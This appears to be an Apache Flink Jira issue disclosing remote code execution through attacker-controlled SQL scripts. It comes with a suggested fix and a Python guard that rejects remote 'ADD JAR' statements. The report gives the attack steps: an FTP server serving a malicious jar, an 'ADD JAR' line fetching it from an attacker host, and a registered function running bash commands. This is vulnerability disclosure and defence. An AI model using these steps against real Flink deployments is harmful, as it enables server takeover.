gaoyu shi created FLINK-32221:
---------------------------------
Summary: Attacker can achieve Remote Code Execution when they can
control Flink SQL script content
Key: FLINK-32221
URL: https://issues.apache.org/jira/browse/FLINK-32221
Project: Flink
Issue Type: Bug
Environment: all versions that support SQL scripts.
Reporter: gaoyu shi
Attachments: image-2023-05-31-14-58-21-800.png,
image-2023-05-31-14-59-50-875.png
Flink SQL scripts have syntax similar to traditional SQL, which means they are also
susceptible to SQL injection vulnerabilities.
An attacker can achieve Remote Code Execution when they can control part or all of
the Flink SQL script content, by following these steps.
1. The attacker develops a malicious custom scalar function class and packages it
into a jar.
!image-2023-05-31-14-59-50-875.png|width=721,height=251!
2. Run an FTP server on the attacker's host and place the malicious jar in it.
{code:bash}
# install the python-ftp-server tool
pip install python-ftp-server
# run the FTP server
python3 -m python_ftp_server -d . --ip <public interface ip> -p password
# copy the malicious jar into the served directory
cp <evil.jar-path> .
{code}
3. Submit the Flink SQL script that triggers code execution; this assumes the
attacker controls part or all of the Flink SQL script through SQL injection or
another method.
{code:sql}
-- transfer the malicious jar from the attacker's host to the victim
ADD JAR 'ftp://user:password@<attacker-ip>:60000/evil.jar';
-- register the malicious function in the SQL context
CREATE FUNCTION EVIL AS 'org.example.Evil';
-- run any bash command
SELECT EVIL('<bash command>');
{code}
In summary, this vulnerability allows an attacker to obtain remote code execution
through a Flink SQL script. After looking at several websites that use Flink, it is
very common to concatenate user input into Flink SQL statements, or even to directly
allow users to enter arbitrary Flink SQL scripts to process data.
I allow that it is not a vulnerability to execute malicious code by submitting a
malicious jar package through Flink's web interface, because developers will hide
Flink's web interface by default, for example by listening only on localhost.
However, malicious code execution through Flink SQL scripts is completely different.
Currently, there is no hardening method or default configuration that can prevent
attackers from using Flink SQL to achieve arbitrary code execution.
Suggestion:
The 'ADD JAR' command should not be able to load remote jars, or it should at least
be disabled by default.
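Until such a default exists, a deployment can refuse scripts of this shape before they reach the SQL gateway. The following guard is an added example, not part of this report or of Flink; the allow-listed jar directory, the vetted class prefix and the 203.0.113.5 address are constructed values, and the statement splitter assumes no ';' inside string literals.

```python
"""Pre-submission guard for Flink SQL scripts (added example, not Flink code).
Rejects ADD JAR statements pointing at remote URIs or at paths outside an
allow-listed directory, and flags CREATE FUNCTION with an unvetted class."""
import re
from urllib.parse import urlparse

# Assumed policy values; neither is a real Flink configuration option.
ALLOWED_JAR_DIR = "/opt/flink/approved-udfs/"
ALLOWED_CLASS_PREFIXES = ("com.example.vetted.",)

_COMMENT_RE = re.compile(r"--[^\n]*|/\*.*?\*/", re.DOTALL)
_ADD_JAR_RE = re.compile(r"^ADD\s+JAR\s+'([^']*)'$", re.IGNORECASE)
_CREATE_FN_RE = re.compile(
    r"^CREATE\s+(?:TEMPORARY\s+)?(?:SYSTEM\s+)?FUNCTION\s+(?:IF\s+NOT\s+EXISTS\s+)?"
    r"([\w.`]+)\s+AS\s+'([^']*)'",
    re.IGNORECASE,
)

def split_statements(script):
    """Strip SQL comments and split on ';' (assumes no ';' inside string literals)."""
    cleaned = _COMMENT_RE.sub(" ", script)
    return [s.strip() for s in cleaned.split(";") if s.strip()]

def check_flink_sql(script):
    """Return (statement_index, reason) findings; an empty list means the script passes."""
    findings = []
    for idx, stmt in enumerate(split_statements(script)):
        jar = _ADD_JAR_RE.match(stmt)
        if jar:
            uri = urlparse(jar.group(1))
            if uri.scheme and uri.scheme.lower() != "file":
                findings.append((idx, f"ADD JAR fetches a remote jar via {uri.scheme}: {jar.group(1)}"))
            elif ".." in uri.path or not uri.path.startswith(ALLOWED_JAR_DIR):
                findings.append((idx, f"ADD JAR path outside {ALLOWED_JAR_DIR}: {jar.group(1)}"))
            continue
        fn = _CREATE_FN_RE.match(stmt)
        if fn and not fn.group(2).startswith(ALLOWED_CLASS_PREFIXES):
            findings.append((idx, f"CREATE FUNCTION {fn.group(1)} uses unvetted class {fn.group(2)}"))
    return findings

if __name__ == "__main__":
    # Constructed script reproducing the report's pattern (203.0.113.5 is a documentation address).
    demo = """ADD JAR 'ftp://user:password@203.0.113.5:60000/evil.jar';
CREATE FUNCTION EVIL AS 'org.example.Evil';
SELECT EVIL('id');"""
    for idx, reason in check_flink_sql(demo):
        print(f"statement {idx}: {reason}")
```

The guard is a policy layer on text only; it complements, rather than replaces, disabling remote 'ADD JAR' in the engine itself.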
--
This message was sent by Atlassian Jira
(v8.20.10#820010)